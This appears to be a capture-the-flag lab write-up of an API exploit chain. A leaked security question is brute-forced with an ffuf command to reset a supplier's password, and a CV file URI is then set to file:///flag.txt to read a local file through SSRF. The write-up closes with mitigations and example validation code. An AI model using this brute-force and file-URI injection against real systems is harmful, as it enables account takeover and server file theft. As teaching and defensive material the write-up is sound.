🔴 Skills Assessment - Full Exploit Chain (v2)

Introduction

Although v2 was claimed to be secure, multiple vulnerabilities can still be chained together to achieve full compromise.

This attack consists of:

  1. Excessive Data Exposure
  2. Weak Authentication (Security Question)
  3. Account Takeover via brute force
  4. SSRF → Local File Read

Objective

Retrieve the contents of:

/flag.txt

Step 1: Initial Access

We authenticate as a customer:

POST /api/v2/authentication/customers/sign-in

Then check roles:

GET /api/v2/roles/current-user

Response:

{
  "errorMessage": "User does not have any roles assigned"
}

No roles means limited access, so we focus on endpoints that require no roles.

Step 2: Identify Sensitive Data Exposure

We explore supplier-related endpoints and discover that some endpoints expose:

  • Emails
  • Security questions

This is a Broken Object Property Level Authorization (BOPLA) issue.

Example:

"What is your favorite color?"

Weak, guessable security question

Step 3: Brute-Force Security Question (Account Takeover)

We exploit the password reset endpoint:

/api/v2/authentication/suppliers/passwords/resets/security-question-answers

ffuf Attack

ffuf -w emails.txt:EMAIL -w colors.txt:COLOR \
  -u http://<TARGET_IP>/api/v2/authentication/suppliers/passwords/resets/security-question-answers \
  -X POST \
  -H 'Content-Type: application/json' \
  -d '{"SupplierEmail": "EMAIL", "SecurityQuestionAnswer": "COLOR", "NewPassword": "123456"}' \
  -fr "false"

Result

COLOR: rust
EMAIL: B.Rogers1535@globalsolutions.com

This means:

  • Correct security answer found: rust
  • Password successfully reset

Step 4: Login to Compromised Account

We now authenticate as:

B.Rogers1535@globalsolutions.com

Then check user data:

GET /api/v2/suppliers/current-user

Important Observation

{
  "professionalCVPDFFileURI": "SupplierDidNotUploadYet"
}

This field is user-controlled and looks interesting.

Step 5: Identify SSRF Entry Point

We find that we can update this field:

PATCH /api/v2/suppliers/current-user

Payload:

{
  "SecurityQuestion": "What is your favorite color?",
  "SecurityQuestionAnswer": "blue",
  "ProfessionalCVPDFFileURI": "file:///flag.txt",
  "PhoneNumber": "123456789",
  "Password": "NewPassword123!"
}

Response:

{
  "SuccessStatus": true
}

No validation on the file path → SSRF / LFI

Step 6: Read the File

We trigger file retrieval:

GET /api/v2/suppliers/current-user/cv

Response:

{
  "successStatus": true,
  "base64Data": "SFRCe2YxOTBiODB...................."
}

Step 7: Decode the Flag

echo "SFRCe2YxOTBiODB.............." | base64 -d

Output:

HTB{flag}

Final Flag

HTB{flag}

Vulnerability Chain Explained

1. Excessive Data Exposure (BOPLA)

  • Sensitive fields exposed:
      • Emails
      • Security questions

2. Weak Authentication

  • Security question: "What is your favorite color?"
  • Easily brute-forced

3. Account Takeover

  • Password reset endpoint lacks protections
  • No rate limiting or lockout

4. Broken Authorization

  • Update endpoint requires no roles

5. SSRF / Local File Inclusion

  • User controls: ProfessionalCVPDFFileURI
  • Backend reads: file:///flag.txt

6. Sensitive File Disclosure

  • API returns Base64 file content

Security Impact

This chain allows an attacker to:

  • Take over supplier accounts
  • Read local server files
  • Extract secrets and configs
  • Potentially escalate to full system compromise

Mitigation

Authentication

  • Remove security questions or strengthen them
  • Add rate limiting to reset endpoints

Authorization

  • Require roles for sensitive operations

Input Validation

  • Block file:// scheme
  • Restrict file paths to safe directories
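The two checks above, written out as an added example (not code from the original write-up or the target API): an allowlist on the stored ProfessionalCVPDFFileURI, which refuses file:// and any host not explicitly trusted, plus a containment check for local CV paths. The storage host name and base directory are assumed placeholders.

```python
# Added example (not from the original write-up): server-side checks that a
# v2-style backend could apply to ProfessionalCVPDFFileURI before storing or
# fetching it. ALLOWED_HOSTS and CV_BASE_DIR are assumed placeholder values.
import os
from typing import Optional, Tuple
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"https"}                  # file://, http://, gopher:// all rejected
ALLOWED_HOSTS = {"cv-uploads.example.test"}  # assumed trusted storage host
CV_BASE_DIR = "/srv/app/cv-uploads"          # assumed local upload directory


def validate_cv_uri(uri: str) -> Tuple[bool, str]:
    """Return (accepted, reason). Only https URLs on allowlisted hosts pass,
    so loopback and internal hostnames are refused by default rather than by
    a denylist that alternate encodings can slip past."""
    parsed = urlparse(uri.strip())
    scheme = parsed.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {scheme or '(none)'}"
    if parsed.username or parsed.password:
        # "https://trusted-host@other-host/" would otherwise read as trusted
        return False, "credentials in URL not allowed"
    host = (parsed.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return False, f"host not allowed: {host or '(none)'}"
    return True, "ok"


def safe_local_cv_path(filename: str) -> Optional[str]:
    """Map a stored CV filename onto CV_BASE_DIR; return None if the result
    would escape that directory (absolute path, '..' or symlink tricks)."""
    base = os.path.realpath(CV_BASE_DIR)
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for u in ("file:///flag.txt", "http://127.0.0.1/x.pdf",
              "https://cv-uploads.example.test/cv/123.pdf"):
        print(u, "->", validate_cv_uri(u))
    for f in ("123.pdf", "../../flag.txt", "/flag.txt"):
        print(f, "->", safe_local_cv_path(f))
```

Run on the PATCH payload from Step 5, the file:///flag.txt value is rejected at the scheme check before anything is stored, and the later GET .../cv has nothing to fetch.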

Data Exposure

  • Do not expose sensitive fields (security questions, emails)

Key Takeaways

  • Small issues become critical when chained
  • Security questions are weak authentication
  • SSRF often leads to LFI
  • "No roles required" endpoints are dangerous